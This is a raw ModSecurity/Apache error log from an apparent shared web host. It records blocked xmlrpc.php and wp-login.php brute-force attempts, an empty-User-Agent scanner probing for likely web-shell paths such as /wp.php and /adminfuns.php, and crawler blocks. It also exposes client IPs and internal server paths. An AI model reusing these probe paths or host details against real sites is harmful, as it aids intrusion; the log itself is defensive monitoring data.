[Tue May 26 19:27:30.256604 2026] [security2:error] [pid 49598:tid 49728] [client 4.241.228.159:2313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/about.php"] [unique_id "ahWmyuzJzkdc0WtdrwtXYQAAAIU"]
[Tue May 26 19:27:30.256696 2026] [security2:error] [pid 49598:tid 49728] [client 4.241.228.159:2313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/about.php"] [unique_id "ahWmyuzJzkdc0WtdrwtXYQAAAIU"]
[Tue May 26 19:27:30.852451 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:27013] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyuzJzkdc0WtdrwtXdQAAAIo"]
[Tue May 26 19:27:30.852644 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:27013] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyuzJzkdc0WtdrwtXdQAAAIo"]
[Tue May 26 19:27:31.634271 2026] [security2:error] [pid 49598:tid 49773] [client 91.245.236.124:35239] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmy-zJzkdc0WtdrwtXhwAAALI"]
[Tue May 26 19:27:31.634387 2026] [security2:error] [pid 49598:tid 49773] [client 91.245.236.124:35239] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmy-zJzkdc0WtdrwtXhwAAALI"]
[Tue May 26 19:27:31.828097 2026] [security2:error] [pid 49598:tid 49674] [remote 91.227.122.219:33264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmy-zJzkdc0WtdrwtXiQAA50s"]
[Tue May 26 19:27:32.106847 2026] [security2:error] [pid 49598:tid 49762] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmy-zJzkdc0WtdrwtXjQAAAKc"]
[Tue May 26 19:27:32.328556 2026] [security2:error] [pid 49598:tid 49621] [remote 176.31.139.26:47824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWmzOzJzkdc0WtdrwtXowABAxY"]
[Tue May 26 19:27:32.328762 2026] [security2:error] [pid 49598:tid 49854] [client 176.31.139.26:47824] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/robots.txt"] [unique_id "ahWmzOzJzkdc0WtdrwtXowABAxY"]
[Tue May 26 19:27:32.418165 2026] [security2:error] [pid 49598:tid 49804] [client 91.245.236.124:11867] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzOzJzkdc0WtdrwtXpAAAANE"]
[Tue May 26 19:27:32.418298 2026] [security2:error] [pid 49598:tid 49804] [client 91.245.236.124:11867] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzOzJzkdc0WtdrwtXpAAAANE"]
[Tue May 26 19:27:32.961468 2026] [security2:error] [pid 49598:tid 49622] [remote 165.22.214.22:38438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.214.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWmzOzJzkdc0WtdrwtXrwAAnRc"]
[Tue May 26 19:27:32.977535 2026] [security2:error] [pid 49598:tid 49628] [remote 74.7.241.58:37286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWmzOzJzkdc0WtdrwtXtgAA5h0"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/woocommerce/templates/cart
[Tue May 26 19:27:33.164715 2026] [security2:error] [pid 49598:tid 49829] [client 4.241.228.159:2324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wp.php"] [unique_id "ahWmzezJzkdc0WtdrwtXwAAAAOo"]
[Tue May 26 19:27:33.164849 2026] [security2:error] [pid 49598:tid 49829] [client 4.241.228.159:2324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wp.php"] [unique_id "ahWmzezJzkdc0WtdrwtXwAAAAOo"]
[Tue May 26 19:27:33.191286 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:30293] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzezJzkdc0WtdrwtXwQAAAPA"]
[Tue May 26 19:27:33.191408 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:30293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzezJzkdc0WtdrwtXwQAAAPA"]
[Tue May 26 19:27:33.972818 2026] [security2:error] [pid 49598:tid 49790] [client 91.245.236.124:44473] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzezJzkdc0WtdrwtX1QAAAMM"]
[Tue May 26 19:27:33.972973 2026] [security2:error] [pid 49598:tid 49790] [client 91.245.236.124:44473] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzezJzkdc0WtdrwtX1QAAAMM"]
[Tue May 26 19:27:34.234769 2026] [security2:error] [pid 49598:tid 49626] [remote 51.161.65.4:36366] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.yourstorybag.com"] [uri "/"] [unique_id "ahWmzuzJzkdc0WtdrwtX2wAAkhs"]
[Tue May 26 19:27:34.234938 2026] [security2:error] [pid 49598:tid 49741] [client 51.161.65.4:36366] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/"] [unique_id "ahWmzuzJzkdc0WtdrwtX2wAAkhs"]
[Tue May 26 19:27:34.540338 2026] [security2:error] [pid 49598:tid 49801] [client 114.119.153.186:30941] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/web-sitesi-paketi/kurumsal-web-sitesi/"] [unique_id "ahWmzuzJzkdc0WtdrwtX6QAAAM4"], referer: https://trickyairbedshocks.com/s/cdn/?cagmedya.com
[Tue May 26 19:27:34.680326 2026] [security2:error] [pid 49598:tid 49771] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmzuzJzkdc0WtdrwtX4QAAALA"]
[Tue May 26 19:27:34.695753 2026] [security2:error] [pid 49598:tid 49839] [client 4.241.228.159:2312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/.dj/index.php"] [unique_id "ahWmzuzJzkdc0WtdrwtX6gAAAPQ"]
[Tue May 26 19:27:34.695855 2026] [security2:error] [pid 49598:tid 49839] [client 4.241.228.159:2312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/.dj/index.php"] [unique_id "ahWmzuzJzkdc0WtdrwtX6gAAAPQ"]
[Tue May 26 19:27:34.733709 2026] [core:crit] [pid 49598:tid 49795] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:27:34.733909 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:20665] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzuzJzkdc0WtdrwtX7wAAALo"]
[Tue May 26 19:27:34.734019 2026] [security2:error] [pid 49598:tid 49781] [client 91.245.236.124:20665] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmzuzJzkdc0WtdrwtX7wAAALo"]
[Tue May 26 19:27:34.915085 2026] [security2:error] [pid 49598:tid 49610] [remote 165.22.214.22:38438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.214.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWmzuzJzkdc0WtdrwtX-AAAzws"], referer: https://taotechservices.com/wp-login.php
[Tue May 26 19:27:35.499731 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:52319] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmz-zJzkdc0WtdrwtYBgAAAKU"]
[Tue May 26 19:27:35.499884 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:52319] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmz-zJzkdc0WtdrwtYBgAAAKU"]
[Tue May 26 19:27:36.283545 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:56197] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0OzJzkdc0WtdrwtYIgAAALw"]
[Tue May 26 19:27:36.283663 2026] [security2:error] [pid 49598:tid 49783] [client 91.245.236.124:56197] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0OzJzkdc0WtdrwtYIgAAALw"]
[Tue May 26 19:27:36.603381 2026] [security2:error] [pid 49598:tid 49818] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm0OzJzkdc0WtdrwtYHwAAAN8"]
[Tue May 26 19:27:36.755321 2026] [security2:error] [pid 49598:tid 49811] [client 4.241.228.159:2319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/adminfuns.php"] [unique_id "ahWm0OzJzkdc0WtdrwtYKwAAANg"]
[Tue May 26 19:27:36.755454 2026] [security2:error] [pid 49598:tid 49811] [client 4.241.228.159:2319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/adminfuns.php"] [unique_id "ahWm0OzJzkdc0WtdrwtYKwAAANg"]
[Tue May 26 19:27:37.127348 2026] [security2:error] [pid 49598:tid 49848] [client 91.245.236.124:38341] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0ezJzkdc0WtdrwtYPAAAAP0"]
[Tue May 26 19:27:37.127465 2026] [security2:error] [pid 49598:tid 49848] [client 91.245.236.124:38341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0ezJzkdc0WtdrwtYPAAAAP0"]
[Tue May 26 19:27:37.271128 2026] [security2:error] [pid 49598:tid 49751] [client 14.190.182.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm0OzJzkdc0WtdrwtYMQAAAJw"]
[Tue May 26 19:27:37.828351 2026] [security2:error] [pid 49598:tid 49841] [client 116.212.191.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWm0ezJzkdc0WtdrwtYTwAAAPY"]
[Tue May 26 19:27:38.009576 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:59163] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0uzJzkdc0WtdrwtYXAAAAIY"]
[Tue May 26 19:27:38.009711 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:59163] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0uzJzkdc0WtdrwtYXAAAAIY"]
[Tue May 26 19:27:38.476806 2026] [security2:error] [pid 49598:tid 49834] [client 43.173.173.154:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWm0uzJzkdc0WtdrwtYagAAAO8"]
[Tue May 26 19:27:38.811648 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:56839] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0uzJzkdc0WtdrwtYdgAAAOU"]
[Tue May 26 19:27:38.811770 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:56839] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0uzJzkdc0WtdrwtYdgAAAOU"]
[Tue May 26 19:27:38.903124 2026] [security2:error] [pid 49598:tid 49780] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm0uzJzkdc0WtdrwtYcgAAALk"]
[Tue May 26 19:27:39.266755 2026] [security2:error] [pid 49598:tid 49664] [remote 92.117.185.70:62977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm0-zJzkdc0WtdrwtYegAA3EE"]
[Tue May 26 19:27:39.594153 2026] [security2:error] [pid 49598:tid 49785] [client 91.245.236.124:17815] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0-zJzkdc0WtdrwtYkgAAAL4"]
[Tue May 26 19:27:39.594254 2026] [security2:error] [pid 49598:tid 49785] [client 91.245.236.124:17815] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm0-zJzkdc0WtdrwtYkgAAAL4"]
[Tue May 26 19:27:39.643764 2026] [core:crit] [pid 49598:tid 49851] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:27:40.008776 2026] [security2:error] [pid 49598:tid 49809] [client 4.241.228.159:2826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/php8.php"] [unique_id "ahWm1OzJzkdc0WtdrwtYngAAANY"]
[Tue May 26 19:27:40.008891 2026] [security2:error] [pid 49598:tid 49809] [client 4.241.228.159:2826] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/php8.php"] [unique_id "ahWm1OzJzkdc0WtdrwtYngAAANY"]
[Tue May 26 19:27:40.152601 2026] [core:crit] [pid 49598:tid 49813] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:27:40.374447 2026] [security2:error] [pid 49598:tid 49759] [client 91.245.236.124:17549] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1OzJzkdc0WtdrwtYqwAAAKQ"]
[Tue May 26 19:27:40.374557 2026] [security2:error] [pid 49598:tid 49759] [client 91.245.236.124:17549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1OzJzkdc0WtdrwtYqwAAAKQ"]
[Tue May 26 19:27:40.918569 2026] [security2:error] [pid 49598:tid 49646] [remote 216.251.35.203:13244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWm1OzJzkdc0WtdrwtYvgAA4i8"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:27:41.015142 2026] [security2:error] [pid 49598:tid 49799] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm1OzJzkdc0WtdrwtYtAAAAMw"]
[Tue May 26 19:27:41.142213 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:54501] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1ezJzkdc0WtdrwtYzQAAAPw"]
[Tue May 26 19:27:41.142311 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:54501] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1ezJzkdc0WtdrwtYzQAAAPw"]
[Tue May 26 19:27:41.832818 2026] [security2:error] [pid 49598:tid 49731] [client 4.241.228.159:2358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/classwithtostring.php"] [unique_id "ahWm1ezJzkdc0WtdrwtY4AAAAIg"]
[Tue May 26 19:27:41.832920 2026] [security2:error] [pid 49598:tid 49731] [client 4.241.228.159:2358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/classwithtostring.php"] [unique_id "ahWm1ezJzkdc0WtdrwtY4AAAAIg"]
[Tue May 26 19:27:41.931467 2026] [security2:error] [pid 49598:tid 49780] [client 91.245.236.124:56579] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1ezJzkdc0WtdrwtY5QAAALk"]
[Tue May 26 19:27:41.931587 2026] [security2:error] [pid 49598:tid 49780] [client 91.245.236.124:56579] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm1ezJzkdc0WtdrwtY5QAAALk"]
[Tue May 26 19:27:42.219285 2026] [security2:error] [pid 49598:tid 49776] [client 85.208.96.198:18426] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/day/2025-06-08/"] [unique_id "ahWm1uzJzkdc0WtdrwtY7wAAALU"]
